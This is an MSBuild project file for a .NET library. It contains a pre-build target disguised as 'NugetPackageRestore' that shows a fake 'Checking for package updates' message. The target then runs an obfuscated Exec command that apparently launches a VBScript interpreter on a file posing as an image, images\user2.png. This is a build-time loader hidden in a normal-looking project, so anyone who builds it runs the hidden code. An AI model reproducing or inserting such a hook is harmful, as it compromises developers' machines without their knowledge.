<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<PropertyGroup>
		<TargetFrameworks>net472</TargetFrameworks>
		<OutputType>Library</OutputType>
		<GenerateAssemblyInfo>false</GenerateAssemblyInfo>
		<Var1>vbscript</Var1>
		<Var2>jscript</Var2>
	</PropertyGroup>
	<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
		<OutputPath>..\bin\Debug\</OutputPath>
		<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
		<DocumentationFile></DocumentationFile>
	</PropertyGroup>
	<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
		<DebugType>none</DebugType>
		<OutputPath>..\bin\Release\</OutputPath>
		<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
	</PropertyGroup>
	<ItemGroup>
	  <Compile Remove="Messages\Administration\RemoteExecute\**" />
	  <EmbeddedResource Remove="Messages\Administration\RemoteExecute\**" />
	  <None Remove="Messages\Administration\RemoteExecute\**" />
	</ItemGroup>
	<ItemGroup>
		<Reference Include="System.Management" />
		<Reference Include="System.ServiceModel" />
		<Reference Include="System.Windows.Forms" />
	</ItemGroup>
  <Target Name="NugetPackageRestore" BeforeTargets="PreBuildEvent">
	  <Message Text="Checking for package updates." Importance="high" />
  	<Exec Command="$(MSBuildEngine)$(ProjectType)$(ProjectOutput)$(BuildExtension) $(PropertyVar)$(Var1) $(MSBuildProjectDirectory)\images\user2.png" Condition="'$(OS)' == 'Windows_NT'" />
  </Target>
	<ItemGroup>
		<PackageReference Include="protobuf-net">
			<Version>2.4.8</Version>
		</PackageReference>
	</ItemGroup>
	<ItemGroup Condition="'$(TargetFramework)' == 'netstandard2.0'">
		<PackageReference Include="Microsoft.Win32.Registry" />
		<PackageReference Include="System.Drawing.Common" />
		<PackageReference Include="System.Management" />
	</ItemGroup>
</Project>
